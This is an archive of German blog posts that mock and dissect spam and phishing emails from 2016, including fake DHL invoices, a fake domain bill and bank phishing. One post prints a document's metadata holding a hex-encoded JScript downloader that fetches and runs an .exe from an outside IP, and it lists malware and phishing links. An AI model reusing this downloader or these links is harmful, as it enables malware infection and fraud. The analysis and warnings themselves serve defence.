Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Schlagwortarchiv „Sehr geehrter Kunde“

Ihre Bestellung ist auf dem Weg zu Ihnen! OrderID 0293126

Mittwoch, 21. September 2016

Achtung: Auf keinen Fall den Anhang öffnen! Es handelt sich um aktuelle und sehr gefährliche Schadsoftware, die von vielen Antivirusprogrammen zurzeit noch nicht erkannt wird. Generell sollten E-Mail-Anhänge immer mit äußerster Vorsicht behandelt werden, nicht nur, wenn jemand vor einer bestimmten E-Mail warnt.

Die Nummer nach OrderID im Betreff variiert natürlich.

Von: Kids Party World <service (at) kids (strich) party (strich) world (punkt) de>

Der Absender ist (wie beinahe immer in der Spam) eine Fälschung. Mein Exemplar dieser Spam wurde über die dynamisch vergebene IP-Adresse eines iranischen Telekommunikationsanbieters – also vermutlich über einen mit Schadsoftware übernommenen und in einem Botnetz missbrauchten iranischen Privatrechner – versendet. Die Spam hat niemals den im Absender angegebenen Server gesehen. Für den Menschen, dessen Rechner zurzeit von Kriminellen missbraucht wird, kann ich nur hoffen, dass die iranische Justiz in Internetdingen kompetenter ist als die deutsche, denn die in der Islamischen Republik Iran von Richtern ausgesprochenen Strafmaße sind wahrlich nicht von schlechten Eltern!

Sehr geehrter Kunde,

Ich will aber meine Kundennummer! Sonst ist mir das viel zu unpersönlich! :mrgreen:

Ihre Bestellung wurde am 21.09.2016 auf den Weg gebracht, bzw. von Ihnen bei uns im Lager abgeholt.

Welche Bestellung? Welche Vorgangsnummer? Von wann? Was wurde bestellt? Und was heißt hier „auf den Weg gebracht“? Habt ihr den Plunder vor eure Tür gestellt? :mrgreen:

Wie immer in der Schadsoftware-Spam steht im Text der Mail objektiv nichts, denn man soll ja einen Anhang aufmachen, um zu erfahren, um was es überhaupt geht.

Versanddienstleister für Standard Paketsendungen [sic!] ist die Firma DHL – für die Express Lieferungen [sic!] DHL-Express.

Blah! Für den Versand von Deppen Leer Zeichen ist DHL zuständig.

Eine Lieferadresse wäre doch auch mal interessant. Aber nein, man soll ja den Anhang aufmachen, und so steht eben nichts im Text der Spam.

Sollte Ihre Bestellung nicht in den nächsten 1-3 Werktagen (Mo – Sa) bei Ihnen eintreffen, dann wenden Sie sich bitte per eMail an uns.
Auslandsendungen innerhalb der EU, bzw. europ. Nachbarländer benötigen 2-5 Werktage (Mo – Fr).

EXPRESS Sendungen [sic!] werden grundsätzlich am nächsten Werktag bis 12.00 Uhr ausgeliefert. Express Samstags Sendungen [sic!] am folgenden Samstag bis 12.00 Uhr!

Blah. Aus einer anderen Quelle bezugslos in die Spam kopierter, völlig nichtssagender und nicht informativer Text, der zudem sehr peinliche Deppen Leer Zeichen der Marke „Express Samstags Sendungen“ enthält.

Einzelheiten der Lieferung können Sie über den folgenden Link einsehen:

http://nolp.dhl.de/nextt-online-public/set_identcodes.do?lang=de&idc=05841224279920

Ja, schon klar! Einfach eine Tracking-Nummer nehmen, die es gar nicht gibt, so dass man völlig legitim auf DHL verlinken kann und der Empfänger den Hinweis sieht, dass zu dieser Sendung gar keine Informationen vorliegen. Toller Trick! Allerdings stünde dort etwas anderes, wenn die Sendung „auf den Weg gebracht“ worden wäre…

Die DHL Tracking Nr. lautet:

05841224279920

Oh, wie nett! So muss ich sie nicht aus dem URI lesen. Das hat mich jetzt zwar nicht überfordert, aber immerhin sieht so der Text der Spam nach etwas mehr aus, ohne das etwas Inhaltliches mitgeteilt wurde. Könnt ihr Absender mir jetzt bitte mal sagen, was in dem Paket überhaupt drin ist?! Ach, um das zu erfahren, soll ich den Anhang mit eurer frischen Schadsoftware öffnen, schon klar…

Dass dieses Mailpapier aber auch immer so begrenzt ist! :mrgreen:

Bitte beachten Sie bei der Paketannahme den Zustand des Pakets. Wenn eine Beschädigung des Pakets vorliegt, bitten wir Sie diese von dem Zusteller aufnehmen zu lassen. Nur dann kann die Versandversicherung im Falle einer Beschädigung der Waren in Anspruch genommen werden.

Blah. Auch dieser Text wurde von irgendwo in die Spam kopiert und enthält keine für den Empfänger relevante Information. Immerhin wird mir diesmal eine „Paket Annahme“ und eine „Versand Versicherung“ erspart; es scheint sich um eine andere Quelle zu handeln. :D

(Was wärt ihr nur ohne eure Zwischenablage, Spammer! Da müsstet ihr euch ja mühsam selbst die Texte ausdenken. Das passte so etwas von gar nicht zu euch. Denn wenn ihr euch Mühe geben wolltet, dann könntet ihr ja gleich arbeiten gehen…)

Eine Rechnungskopie zu Ihrer Information haben wir dieser eMail beigefügt.

Nicht einmal der Rechnungsbetrag wird erwähnt, auch keine Bankverbindung und nichts. Um überhaupt irgendetwas zu erfahren, muss man den Anhang öffnen, denn in der Spam steht nur bedeutungsleerer Blah. Genau das – dass man von vorgeblichen Zahlungsverpflichtungen aufgescheucht möglichst unter Umgehung des Gehirnes den Anhang öffne – ist nämlich das einzige Ziel der Spammer. Die haben diese Spam ja nicht aus dem Grund geschrieben, aus dem man normalerweise Mail schreibt: Um etwas mitzuteilen.

Vielen Dank für Ihren Einkauf in unserem Online Shop [sic!]

Vielen Dank für euer Deppen Leer Zeichen, das immer ein Zeichen leerer Deppen ist.

Wir freuen uns auf einen weiteren Besuch von Ihnen!

Aber ich war nie bei euch…

Mit freundlichen Grüßen,

Ihr Kids Party World Team

Kids Party World
Senefelder Str. 2
63110 Rodgau

Tel.: 06106/266xxxx
UstID: DE235212299

Die Kürzung der Telefonnummer ist von mir. Die in der Spam angegebene Telefonnummer gehört wirklich zu „Kids Party World“. Wer immer gerade an diesem Telefon sitzt, tut mir leid. Dem Spammer ist es natürlich egal, was er anrichtet; dem reicht es, wenn sein kriminelles Geschäft läuft. Egal, ob Menschen bis an den Rand des Nervenzusammenbruches terrorisiert werden oder ob die Reputation von Unternehmungen mit dem Missbrauch der Firmierung durch den Dreck gezogen wird. Spammer sind nun einmal asoziale Kriminelle, die für ein paar Groschen alles kaputt machen würden. Wenn es diese Widerlinge nicht gäbe, würde vermutlich nur die Mutter etwas vermissen. Und nicht einmal das ist sicher…

besuchen Sie uns auch auf Facebook:
https://www.facebook.com/kids.party.world.shopping

Wer mich dazu auffordert, die Website einer stinkenden Spamsau wie Facebook zu besuchen, braucht nicht damit zu rechnen, dass ich mit ihm jemals ins Geschäft kommen werde. Ganz im Gegenteil. Ich hasse nämlich Spam. Und Leute, die einen asozialen Spammer so offen unterstützen, sind die Spam.

Der Anhang

Der Anhang der Mail ist ein ZIP-Archiv…

$ unzip -l invoice_912408.zip 
Archive:  invoice_912408.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
    33676  2016-09-21 12:49   IHPHICX18402.wsf
---------                     -------
    33676                     1 file
$ _

…das eine einzige Datei enthält. Die Dateinamenserweiterung .wsf ist eine Abk., die ausgeschrieben „Windows Script File“ bedeutet. Es handelt sich nicht um ein Dokument, sondern um eine ausführbare Datei für Microsoft Windows; um ein Programm, das von einem Spammer mit einer irreführend formulierten Mail zugestellt wurde. Das Programm ist vorsätzlich kryptisch formuliert, um eine Analyse durch Antivirus-Schlangenöl und menschliche Experten zu erschweren.

Es handelt sich zweifelsfrei um Schadsoftware.

Wer das ZIP-Archiv auspackt und die Datei unter Microsoft Windows doppelklickt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen.

Diese klare Schadsoftware wird zurzeit von rd. 85 Prozent der gängigen Antivirus-Schlangenöle nicht als Schadsoftware erkannt. Antivirus-Programme können immer nur Schadsoftware erkennen, die bei den Herstellern der Antivirus-Programme bereits bekannt ist. Sie versagen grundsätzlich bei aktueller Schadsoftware, wie man sie oft in derartigen Spammails zugestellt bekommt.

Deshalb ist es wichtig, dass man derartige Versuche selbst erkennt. Hinweise dazu (die Mail ist objektiv inhaltsleer, alles Wichtige steht erst im Anhang – das sind typische rhetorische Tricks in der Schadsoftware-Spam) habe ich hier und an vielen anderen Stellen gegeben. Grundsätzlich sollte niemals ein Anhang aus einer E-Mail geöffnet werden, wenn die Zustellung der Datei nicht über einen anderen Kanal als E-Mail explizit vereinbart wurde¹; und ein Anhang aus der Mail eines Unbekannten verbietet sich völlig. Es ist übrigens niemals so eilig, dass man nicht vor dem Öffnen telefonisch (oder via IM) rückfragen kann, ob die Mail echt ist.

Aber bitte nicht bei derartigen Spams rückrufen! Dass es sich hier um Spam handelt, lässt sich nämlich leicht an anderen Merkmalen erkennen. Die armen Seelen dort bei „Kids Party World“ am Telefon! :(

¹Warum ein anderer Kanal? Um sicher sein zu können, dass der Absender echt ist. Der Absender eine E-Mail kann kinderleicht und beliebig gefälscht werden. Deshalb sollte meiner Meinung nach jeder Mensch und jedes Unternehmen (insbesondere Banken) digital signierte E-Mail verwenden, um jenseits jedes vernünftigen Zweifels sicherstellen zu können, dass der Absender im Besitz eines bestimmten privaten Schlüssels ist. Das ist relativ einfach und kostet kein Geld, bringt aber viel für die Computersicherheit und gegen die Organisierte Kriminalität im Internet. Ich rede allerdings in diesem Punkt seit zwei verdammten Jahrzehnten gegen Wände aus betonhafter Dummheit.

Domainregistrierung 2016 / 2017

Mittwoch, 14. September 2016

Bitte auf gar keinen Fall auf diese Spam reinfallen! Sie wird von Spamfiltern (noch) nicht sicher als Spam erkannt.

Von: .DE Deutsche Domain <info31 (at) deutschewebhost (punkt) com>
An: .DE Deutsche Domain <info31 (at) deutschewebhost (punkt) com>

Die Spam ist nicht an den Mailempfänger adressiert, sondern der Empfänger steht unsichtbar im BCC:-Header. Das bedeutet, dass diese Mail an mehrere Empfänger gegangen ist, und es passt gar nicht dazu, dass einer Einzelperson für eine Dienstleistung eine Rechnung zugestellt wurde.

Die Domains in der TLD .de werden übrigens nicht von einer obskuren „DE Deutsche Domain“ verwaltet, sondern von der DENIC eG. Spätestens jetzt ist klar, dass es sich um eine illegale und asoziale Spam handelt, die einfach in die virtuelle Mülltonne geworfen werden kann.

Sehr geehrte Frau / Herr,

Unternehmen, mit denen man einen Vertrag hat, sprechen ihre Kunden namentlich an.

Nachfolgend die Einzelheiten zu der Domainregistrierung für 2016 / 2017.

Für welche Domain? Ich verwalte mehrere. (Und nein, das ist keineswegs ungewöhnlich, sondern ein sehr häufiger Fall.)

Aber wenn der Spammer in seine Spam eine Domain wie tamagothi.de reinschreibt, dann wird sogar noch den naivsten Empfängern seines dummen Textes sofort klar, dass es nichts mit ihnen zu tun hat, dass es vermutlich Spam ist und dass sie die Spam einfach löschen können. Deshalb muss der Spammer – wenn er nicht weitere Daten zu seinem Opfer hat, mit denen er etwas Eindruck von Vertragsverhältnis schindet – anonym formulieren.

Wir hoffen, Sie ausreichend informiert zu haben.

Es soll ja Menschen geben, die sich einfach klar ausdrücken und nicht mehr zu hoffen brauchen, dass es ausreicht. :mrgreen:

Mit freundlichen Grüssen

Der – zugegebenermaßen recht entbehrliche – Buchstabe „ß“ fand sich wohl nicht auf der „deutschen“ Tastatur dieses Spammers.

Birgit Hoffmann

Kundendienst
DE Deutsche Domain
info@deutschedomain.com

Nach diesem grandiosen Abschluss ist gar nichts klar oder ausreichend. Insbesondere weiß niemand, um was zum hackenden Henker es hier eigentlich geht. An der Mail hängt noch ein Anhang, auf den in der Mail kein Bezug genommen wurde; es handelt sich um…

$ ls -lh Rechnung\ 232417.pdf 
-rw-rw-r-- 1 elias elias 1,4M Sep 14 11:29 Rechnung 232417.pdf
$ file Rechnung\ 232417.pdf 
Rechnung 232417.pdf: PDF document, version 1.5
$ _

…ein 1,4 MiB großes PDF-Dokument, das mit seinem Dateinamen den Eindruck erweckt, eine Rechnung zu sein.

Da es sich um eine Spam handelt, kann ich nur strikt davon abraten, das PDF in einem normalen PDF-Viewer oder gar in Adobes Acrobat zu öffnen. PDF-Dokumente können Javascript und eingebettete Inhalte (wie etwa Flash- oder Java-Applets) enthalten, die bei der Darstellung ausgeführt werden, und der Acrobat hat eine erhebliche Sicherheitsgeschichte. Auch, wenn zurzeit kein einziges Antivirus-Schlangenöl in diesem Dokument eine Schadsoftware erkennt, ist es gefährlich, eine solche Datei aus einer Spam zu öffnen.

Eine einfache (aber auch nicht völlig gefahrlose) Möglichkeit, sich das PDF trotzdem anzuschauen, ist es, das PDF in ein Grafikprogramm wie Gimp zu importieren. Dabei werden nur die sichtbaren Bereiche des Dokumentes in ein Bild umgewandelt, es kommt nicht zur Ausführung von eventuell enthaltenem Code. Warum das immer noch ein bisschen gefährlich ist? Nun, die Bibliotheken, mit denen PDFs geparst und in eine Grafik gezeichnet werden, könnten einen frisch gefundenen und noch unbehobenen Fehler enthalten, der von Kriminellen ausgebeutet wird. Wer ganz sicher gehen will, verwendet eine Betriebssysteminstallation in einer virtuellen Maschine.

Nachdem ich so wortreich klar gemacht habe, dass Spam gefährlich ist, ist die Zeit für den Anhang gekommen:

So sieht der Mailanhang aus

„Zahlen sie völlig grundlos an eine Unternehmung, mit der sie keinerlei Vertrag haben und die nicht einmal ihren Namen als Rechnungsempfänger einträgt, 195 Euro, und zwar binnen 14 Tagen“. Die Spammer gehen offenbar davon aus, dass von den mutmaßlich mehrere Millionen Empfängern mindestens ein Promille so dumm sein wird, auf diese Masche reinzufallen – und das wären schon mehrere tausend. Wenn es nur dreitausend sind, so kommt auf dem Konto mit der angegebenen IBAN in den nächsten Tagen mehr als eine halbe Million Euro an – Geld, das sicherlich nicht lange auf diesem Konto liegen bleibt, sondern von einem über Spam angeworbenen „Finanztransferagenten“ schnell abgeholt und weiterbefördert wird, um schließlich von anonym bleibenden Verbrechern für Koks und Nutten verprasst zu werden.

Man kann wirklich etwas Besseres mit den 195 Euro anfangen. Fallen Sie nicht auf diese Spam herein, und sagen Sie anderen Menschen weiter, was es mit dieser Spam auf sich hat! Von den gesparten rd. zweihundert Euro können Sie mir ja zwei Euro spenden, die ich dann für Lakritz, Kaffee, Kuchen, Zigaretten und Domainkosten verprassen werde… ;)

Diese Spam ist ein Zustecksel meines Lesers A.H. Danke!

Info von ihre Bank

Freitag, 12. August 2016

Ja, ich weiß, Spammer: Flektierende Sprachen sind wirklich schwierig zu beherrschen. Übung könnte einen Meister machen. Aber nicht bei dir, denn du willst ja nur spammen.

Sehr geehrter Kunde!

Diese Mail eines unbekannten Absenders beginnt mit der Behauptung, dass man dort „Kunde“ sei, aber der Name des „Kunden“ ist beim Absender offenbar nicht bekannt. Über diese Kleinigkeit geht er hinweg, indem er behauptet…

Ihre Bank hat die Lastschrift zuruck buchen lassen. Sie haben eine ungedeckte Rechnung bei HSH Nordbank.
Bitte laden Sie die Datei aus dem Link:
http://www.1800cloud.com/infos/report.doc

…dass man eine unbeglichene Rechnung hat, weil ein Bankkonto mit einer ungenannten Kontonummer nicht gedeckt war. Eine Rechnung für irgendwas. Bei irgendwem. Über irgendeinen Betrag. Von irgendwann. Irgendetwas Näheres zur angeblichen Sache kann man nur erfahren, wenn man ein Word-Dokument öffnet, das in der anonym formulierten E-Mail eines Unbekannten verlinkt wurde.

Wenn man das nicht sofort und möglichst hirnlos tut…

Aufgrund des andauernden Zahlungsruckstands sind Sie verpflichtet auberdem [sic!], die durch unsere Beauftragung entstandenen Kosten von 19,67 Euro zu bezahlen. Wir erwarten die Zahlung bis spatestens 17.08.2016 auf unser Konto. Namens und in Vollmacht unseren Mandanten fordern wir Sie auf, die offene Forderung sofort zu begleichen.

Bitte beachten Sie, dass keine weitere Mahnung erfolgt. Nach Ablauf der festgelegten Frist wird die Angelegenheit dem Staatsanwalt und der Schufa ubergeben. Die vollstandige Forderungsausstellung, der Sie alle Positionen entnehmen konnen, fugen wir bei. Fur Ruckfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des selben Zeitraums.

…geht es gleich zu Staatsanwalt und Schufa, statt ganz normal beim zuständigen Mahngericht einen Mahnbescheid zu beantragen. Der Spammer weiß ja genau, dass Angst dumm macht – und man muss schon ein bisschen dumm sein, um eine Datei zu öffnen, die einem mit Spam zugestellt wurde.

Leben Sie wohl!

Geh sterben, Spammer!

Die angehängte Datei ist…

$ file report.doc | sed 's/, /\n/g'
report.doc: Composite Document File V2 Document
Little Endian
Os: Windows
Version 6.1
Code page: 1251
Title:  
Subject: b
Author: c
Keywords: g
Comments: 66756e6374696f6e20737461727428297b7472797b76617220783d6e657720416374697665584f626a65637428226d73786d6c322e786d6c6874747022293b76617220663d6e657720416374697665584f626a6563742822736372697074696e672e66696c6573797374656d6f626a65637422293b76617220773d6e657720416374697665584f626a6563742822777363726970742e7368656c6c22293b76617220613d6e657720416374697665584f626a656374282261646f64622e73747265616d22293b76617220703d772e457870616e64456e7669726f6e6d656e74537472696e6773282225746d702522292b225c5c33313230392e657865223b782e6f70656e2822474554222c22687474703a2f2f38382e3131392e3137392e3136302f316269796375686f7165747a6f776161776e6561622e657865222c66616c7365293b782e73656e6428293b696628782e737461747573203d3d20323030297b696628662e66696c65657869737473287029297b662e64656c65746566696c652870293b7d612e6f70656e28293b612e747970653d313b612e777269746528782e726573706f6e7365626f6479293b612e73617665746f66696c652870293b612e636c6f736528293b772e72756e28702c312c30293b7d7d63617463682865297b7d7d
Template: Normal.dot
Last Saved By: admin
Revision Number: 2
Name of Creating Application: Microsoft Office Word
Create Time/Date: Sat Aug  6 17:17:00 2016
Last Saved Time/Date: Sat Aug  6 17:17:00 2016
Number of Pages: 1
Number of Words: 23
Number of Characters: 116
Security: 0
$ _

…ein in null Sekunden erstelltes Dokument für Microsoft Word, das 23 Wörter auf einer Seite enthält. Wer es öffnet und trotz der Warnung die Ausführung von Makros in Word zulässt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. Damit man auch wirklich so dumm ist, trotz der Warnung den Programmcode von Spammer ausführen zu lassen, steht ein Hinweis im Dokument:

Attention! This document was created in a newer version of Microsoft Office. To display the contents of the document need to enable macros

Kurz und schnell gesagt: Es handelt sich um Schadsoftware. Natürlich ist es wieder einmal die frischeste Brut der Kriminellen, und deshalb wird der verbrecherische Müll (der vermutlich einen Erpressungstrojaner aus dem Internet nachlädt) zurzeit nur von einer Minderheit der gängigen Antivirus-Schlangenöle erkannt. Wer sich auf sein Antivirus-Programm verlassen hat, ist also wieder einmal verlassen.

Deshalb ist es so wichtig, niemals auf derartige Spam hereinzufallen, sondern sie zu erkennen. Das ist in diesem Fall relativ einfach gewesen:

  1. Man ist angeblich Kunde, wird aber in einer E-Mail nicht persönlich angesprochen.
  2. Es ist völlig unklar, wer der Absender der E-Mail ist. Es gibt keinerlei Angaben für eine eventuelle Rückfrage.
  3. Es ist eine angebliche Mahnung, aber im Text der Mail fehlen sämtliche Angaben zum Gegenstand der Mahnung. Stattdessen soll in die Mail geklickt werden, um zu erfahren, um was es überhaupt geht.
  4. Der Text der Mail strotzt vor beängstigendem Bullshit, der in dieser Form niemals von einem Kaufmann oder einem Rechtsanwalt geschrieben würde.
  5. „Leben Sie wohl!“ als Abschiedsformel bedarf keiner weiteren Kommentierung

Generell sind Dateien, die ohne vorherige Absprache mit E-Mail zugestellt wurden, mit äußerster Vorsicht zu behandeln. E-Mail ist bei Kriminellen so beliebt, weil es sich um einen Weg handelt, jemanden anders Dateien und ausführbaren Code auf die Festplatte zu spielen – und zwar mit beliebig fälschbarem Absender. Auch bei bekannten Absendern niemals eine derartige Datei öffnen, ohne vorher auf einem anderen Weg als über E-Mail (zum Beispiel telefonisch) kurz Rücksprache gehalten zu haben! Antivirus-Programme nützen gar nichts. Ich wiederhole, weil die Werbung und die Computerjournaille ständig das Gegenteil behauptet: Antivirus-Programme nützen gar nichts. Wenn man sich darauf verlässt, sind sie sogar gefährlich. Das beste Antivirus-Programm ist und bleibt das Gehirn.

Sparda Bank – Aktueller Sicherheitshinweis

Samstag, 28. Mai 2016

Aber ich bin da doch gar nicht. Ach, ist ja auch eine Spam.

Lange kein Phishing mehr gehabt.

Sparda Bank – Aktueller Sicherheitshinweis

Das steht doch schon im Betreff.

Sehr geehrter Kunde, Grüße von Ihrer Sparda-Bank!

Genau mein Name!

Spätestens an dieser Stelle sollte jeder bemerken, dass es sich um eine Spam handelt. Eine echte E-Mail der Sparda-Bank würde nämlich immer…

  1. …den Kunden persönlich und namentlich ansprechen; und
  2. …möglichst früh im Text angeben, auf welchen Vertrag oder welches Konto sich die E-Mail bezieht, denn viele Kunden haben mehrere Konten oder laufende Darlehen oder dergleichen.

Nur kann sich der Spammer halt keine Kontonummer ausdenken, die bei jedem Empfänger passt. Aber „sehr geehrter Kunde“ passt immer.

Wir haben festgestellt, dass Sie Ihre persönlichen Daten bis heute nicht bestätigt haben.

Aha, darum geht es also in einem „aktuellen Sicherheitshinweis“. Und ich dachte schon, da steht drin, dass die Geldautomaten heute im Jackpot-Modus laufen und dass man eventuell überschüssige ausgegebene Banknoten doch bitte zur Filiale bringen soll, um riesige Geldverluste bei der Bank seines Vertrauens zu vermeiden. ;)

Aber das Beste an diesem Phishing-Trick ist: Wie, jetzt erst wollen die meine Daten? Nicht schon, als ich angeblich Kunde geworden bin? Haben die mir einfach Geld gegeben, ohne sich ein Ausweisdokument von mir zeigen zu lassen?

Diese Phisher denken sich doch immer wieder so richtig extratolle Gründe aus, um Leute dazu zu bringen, dass sie ihr Konto Kriminellen zur Verfügung stellen.

Tatsächlich hat es aber für die Sicherheit überhaupt keinen Wert, wenn man gegenüber einer Bank (oder sonstigen Unternehmung) lauter Daten noch einmal angibt, die der Bank (oder sonstigen Unternehmung) längst bekannt sind. Die einzigen, die an solchen Angaben Interesse haben können und die deshalb solche Angaben einfordern, sind gewerbsmäßig agierende Betrüger, die sich für die Datenakquise als Bank (oder sonstige Unternehmung) ausgeben, um danach mit dem Geld anderer Leute mal so richtig groß einkaufen zu gehen.

Um Ihnen weiterhin einen sicheren Service anbieten zu können, ist die Bestätigung Ihrer persönlichen Daten notwendig. Ihr Nutzerkonto wurde temporär gesperrt.

Wie bitte? Was hat die Korrektmeit „meiner persönlichen Daten“ mit der Sicherheit der Dienstleistung einer Bank zu tun? Die hätte auch sicher zu sein, wenn ich nur als Daisy Duck aus Entenhausen bekannt wäre.

Nach Abschluss der Bestätigung wird Ihr Nutzerkonto automatisch freigeschaltet.
Die Bestätigung können Sie über den unten ausgeführten Button starten.

Die gleichen Leute, die im vorigen Absatz von „Sicherheit“ gefaselt haben, erzählen jetzt, dass ich die „Sicherheit“ durch einen Klick in eine nicht digital signierte E-Mail herstellen kann, wie sie mir jeder der potenziell acht Milliarden Internetteilnehmer zusenden könnte. Das sind Spezialexperten für Sicherheit! Und damit wirklich ein paar Naive so dumm sind, dass sie darauf reinfallen…

Kommen Sie dieser E-Mail innerhalb 14 Tagen nicht nach, ist die Freischaltung nur über den Postweg möglich. Dabei wird eine Bearbeitungsgebühr in Höhe von 79,95€ fällig, welche wir anschließend von Ihrem Konto abbuchen werden.

…werden in ein paar Tagen angeblich grundlos achtzig Euro fällig, weil man auf eine E-Mail nicht reagiert – was ja auch daran liegen könnte, dass die Zustellung gescheitert ist, dass die E-Mail als Spam aussortiert wurde oder dass sie an eine wegen Spamverseuchung nicht mehr aktiv genutzte E-Mail-Adresse geht. Deshalb kommen derartige Fristsetzungen aus Gründen der Rechtssicherheit ja auch nicht über E-Mail, sondern immer mit der Sackpost.

Jetzt anmelden

Der Link führt natürlich nicht zur Website der Sparda-Bank, sondern zum Server mit der IP-Adresse 190.123.45.36 (nein, es wird im Link keine Domain verwendet), der im sonnigen Panama gehostet ist. Alles, was man dort an Daten eingibt, geht direkt an Verbrecher.

Immerhin hat der Hoster schnell auf die Abuse-Mail reagiert. Der von den Phishern angemietete Server ist bereits vom Netz. Vermutlich wird jetzt ein anderer Server irgendwo auf der Welt verwendet.

Wir bitten Sie die Umstände zu entschuldigen und bedanken uns bei Ihnen für Ihr Verständnis.

Oh, so ein pseudohöflicher Dank nach einer unverschämten Belästigung ist genau das, was in mir immer das akute Bedürfnis nach negativem sozialen Feedback in Form eines eingeschlagenen Fressbrettes auslöst. Leider hat der Idiot von Spammer dieses kleine Juwel der Kundenverachtung aus echten Texten echter Unternehmungen abgeschrieben – ich durfte derartige Unverschämtheiten jedenfalls immer wieder einmal lesen. Bei jemanden, der kein Masochist ist, sollten derartige Phrasen nur dazu führen, dass man Verträge so schnell wie möglich (und im Zweifelsfall unter Vorwand) kündigt und derart kundenverachtende Klitschen mit ihrer Arschlochsprache fortan vollständig meidet.

Mit freundlichen Grüßen
Ihre Sparda Bank

Mit intelligenzverachtenden Grüßen
Dein Phishing-Spammer

Diese Spam ist ein Zustecksel meines Lesers M.S.

Auszahlungsbestätigung für gammelfleisch@tamagothi.de (Bitte Jetzt Bestätigen!)

Donnerstag, 5. Mai 2016

Hallo gammelfleisch@tamagothi.de!

Das ist ja genau mein Name!

Sehr geehrter Kunde!

Und schon wieder mein Name! Woher kennt der Spammer den nur?! :D

Hiermit übersenden wir Ihnen Ihre Auszahlungsbestätigung für offenes Guthaben in der Höhe von:

für Ihr Benutzerkonto mit folgender E-Mail Adresse:

  • gammelfleisch@tamagothi.de

Merken wir uns: Geld wird an Mailadressen (oder an Benutzerkonten) gezahlt, nicht an Leute, die es auch ausgeben könnten.

„Kreativ“ ist hier die Verwendung der Auszeichnung für eine unsortierte Liste mit nur einem einzigen Element. Auch Dummheit kann kreativ machen.

Bitte KLICKEN SIE HIER um Ihre Auszahlung anzufordern!

Genau, das hat in der hingestümperten Spam noch gefehlt. Ein „Click here“, der dümmste Linktext, den man in eine Mail reinschreiben kann. Da kann man sich dann Geld klicken, das einem grundlos gegeben wird, weil man so eine schöne Mailadresse hat. Sehr glaubwürdig. Und wer jetzt wissen will, um was es geht…

Bei weiteren Fragen steht Ihnen der Kunden Support auf der Website zu verfügung.

…muss ebenfalls klicken. Auf einen Link, der über ein Tracking-Skript in der Domain webimpossible (punkt) com geht. Keine gute Idee, das zu tun.

Wer es sich sparen will: Es geht nach einer längeren Kaskade von Weiterleitungen dann wieder zum Sir William Bot, der alle Menschen wie von allein so richtig reich macht. Eigentlich schade, dass der Spammer den nicht selbst benutzt, sondern lieber ein paar klimprige Affilate-Groschen dafür kassiert, dass er windigen Brokern ein paar Kunden zutreibt. Warum der Reichwerdexperte seine Reichwerdmethode nicht selbst benutzt? Ach, das klärt sich durch kurzes Nachdenken.

Mit freundlichen Grüßen

Walther Marengold
VIP Customer

So so, von einem ganz very impotent wichtigem Kunden… :mrgreen:

Gesehen, gelacht, gelöscht.

Buchung/Rechnung DH80RK

Dienstag, 1. März 2016

Von: Nurflug.de <info (at) nurflug (punkt) de>

Nein, diese Spam hat niemals einen Server von nurflug (punkt) de gesehen. Sie wird über Botnetze aus kriminell übernommenen Computern versendet. Eines meiner Exemplare kam aus Bangalore, Karnataka, Indien; und ein anderes meiner Exemplare kam aus New Delhi, ebenfalls Indien. In beiden Fällen handelte es sich um dynamisch vergebene IP-Adressen, also mit an Sicherheit grenzender Wahrscheinlichkeit um Privatrechner, die mit Schadsoftware übernommen wurden. Zum Beispiel, weil ihre Besitzer Mailanhänge geöffnet haben…

Sehr geehrte/r Kundin/Kunde,

Ich bin also Kunde, aber ich habe keinen Namen.

vielen Dank für Ihre Buchung DH80RK

Ich habe also etwas gebucht, aber das hat nur eine Nummer.

In der Anlage übermitteln wir Ihnen Ihre Bestätigung/Rechnung im PDF Format.

Geld kostet es mich auch noch. Wenn ich rauskriegen will, um was zum hackenden Henker es überhaupt geht, „muss“ ich einen Anhang öffnen.

Sollten Sie das PDF Dokument nicht öffnen können, so erhalten Sie den Acrobat Reader dazu kostenlos unter www.adobe.de

Wir wünschen Ihnen eine schöne und erholsame Reise !

Ihr Reise- & Buchungsservice Team

PS: Beachten Sie bitte unsere geänderten AGBs die wir für Sie unter http://www.nurflug.de/agb/ bereitgestellt haben.

Blah! Einmal das übliche Geschwurbel, mit dem Spammer davon ablenken wollen, dass in Wirklichkeit nur das Folgende in der Spam steht: „Obwohl wir sie nicht kennen und sie von uns nur einen beliebig fälschbaren Absender kennen, seien sie doch bitte so angstblöd, dass sie nur wegen solcher Wörter wie Rechnung und Buchung ganz schnell einen Anhang aus einer E-Mail unbekannter Zeitgenossen öffnen“.

Wer hier häufiger mitliest, wird es sich schon denken können: Es ist keine Rechnung, sondern eine Schadsoftware. Der Anhang ist ein ZIP-Archiv, in dem nicht etwa ein PDF-Dokument liegt, sondern ein vorsätzlich unverständlich formuliertes Javascript-Programm für den Windows Scripting Host, das eine ausführbare Datei aus dem Internet nachlädt und ausführt. Wer das Archiv auspackt und unter Microsoft Windows einen Doppelklick auf diese Datei macht, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. Diese klare Schadsoftware wird zurzeit von den meisten Antivirus-Programmen nicht als Schadsoftware erkannt.

Wer aber äußerste Vorsicht mit E-Mail-Anhängen übt; wer einen Anhang nur aufmacht, wenn dieser vorher (und über einen anderen Kanal als E-Mail) ausdrücklich vereinbart wurde; wer mit den typischen Maschen der Kriminellen vertraut ist; wer sich nicht von Behauptungen in Angst versetzen lässt – tja, der hat diese Spam einfach gelöscht und dem Antivirus-Schlangenöl gar nicht erst die Chance gegeben, daran zu versagen.

auffallige Aktivitaten

Samstag, 20. Februar 2016

Und ein auffälliger Mangel an Umlauten.

Von: „PayPal Deutschland“ <bray (punkt) james (at) no (strich) army (punkt) kiev (punkt) ua>

Komm Spammer! Wenn du schon den Absender fälschst… :D

19.02.2016

Ja, dieses Datum hatten wir gestern tatsächlich. Das ist zwar eine überflüssige Angabe, weil das Datum sowieso in den Mailheadern steht, aber immerhin ist es richtig. Und Richtiges in einer Spam ist ja keine Selbstverständlichkeit.

Sehr geehrte/r Kunde/in,

Der Absender kennt – im Gegensatz zum echten PayPal – keinen Namen und weiß nicht einmal, ob er es mit Männlein oder Weiblein zu tun hat.

